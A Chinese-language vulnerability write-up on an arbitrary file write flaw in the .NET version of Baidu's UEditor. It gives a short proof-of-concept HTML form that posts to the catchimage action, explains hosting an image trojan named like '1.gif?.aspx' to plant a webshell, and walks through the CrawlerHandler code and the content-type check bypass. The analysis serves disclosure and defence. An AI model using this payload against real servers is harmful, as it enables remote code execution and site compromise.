UEditor编辑器两个版本任意文件上传漏洞分析

0x01 前言

UEditor是由百度WEB前端研发部开发的所见即所得的开源富文本编辑器，具备轻量、可定制、用户体验优秀等特色 ，被广大WEB应用程序所使用；本次爆出的高危漏洞属于.NET版本，其它的版本暂时不受影响。漏洞成因是在抓取远程数据源的时候未对文件后缀名作验证致使任意文件写入漏洞，黑客利用此漏洞能够在服务器上执行任意指令，综合评级高危。因为时间仓促，本文分析不到位的地方还请多多谅解。

0x02 漏洞利用

笔者本地测试的编辑器是百度官方下载最新的版本1.4.3.3 http://ueditor.baidu.com/website/download.html

本地构造一个html，由于不是上传漏洞因此enctype 不须要指定为multipart/form-data ， 以前见到有poc指定了这个值。完整的poc以下

1 <form action="http://xxxxxxxxx/controller.ashx?action=catchimage" enctype="application/x-www-form-urlencoded"  method="POST">
2   <p>shell addr: <input type="text" name="source[]" /></p >
3   <input type="submit" value="Submit" />
4 </form>

需准备一个图片马儿，远程shell地址须要指定扩展名为 1.gif?.aspx

成功返回webshell

 

 

0x03 漏洞分析

在本地IIS中将目录快速指向到解压后的目录，再访问 controller.ashx 控制器文件。当出现下图的时候表示编辑器成功运行。

控制器中存在多个动做的调用，包含了uploadimage、uploadscrawl、uploadvideo、uploadfile、catchimage等等

这些动做默认状况下均可以远程访问，不排除还有新的高危漏洞；这篇文章重点来介绍catchimage这个分支条件，因为它实例化了CrawlerHandler这个类，因此须要跟进这个通常处理程序类

第一行就获取了外界传入的source[] 数组， 核心调用位于Crawlers = Sources.Select(x => new Crawler(x, Server).Fetch()).ToArray();经过这段lambda表达式来调用类里的方法执行后的结果 ，以下图跟进Fecth方法体内

首先经过IsExternalIPAddress方法判断是不是一个可被DNS解析的域名地址，若是不是就终止运行；逻辑代码以下

这句判断就是 1.5.0开发版本（https://github.com/fex-team/ueditor/blob/dev-1.5.0/net/App_Code/CrawlerHandler.cs）和官方发布版本1.4.3.3最大的区别，在1.5.0版本中删除了此处的判断，致使在任意一个ip地址或域名下均可以执行exp以下图

相对来讲1.5.0版本更加容易触发此漏洞；而在1.4.3.3版本中攻击者须要提供一个正常的域名地址就能够绕过此处判断；

而后进入第二个条件判断 ： 对文件ContentType的识别

这段代码很眼熟，通常常见于php文件上传的时候对文件头的判断，这段代码很容易绕过，只须要构造一张图片马儿就能够绕过它的判断，或者构造一个gif89的假图片也能够绕过；最后编辑器根据配置文件的信息建立对应的目录结构再保存文件，代码以下

至此RCE漏洞原理大体已经清楚明了，期待官方尽快发布漏洞补丁程序。

0x04 防护措施

修改CrawlerHandler.cs 增长对文件扩展名的；IPS等防护产品能够加入相应的特征；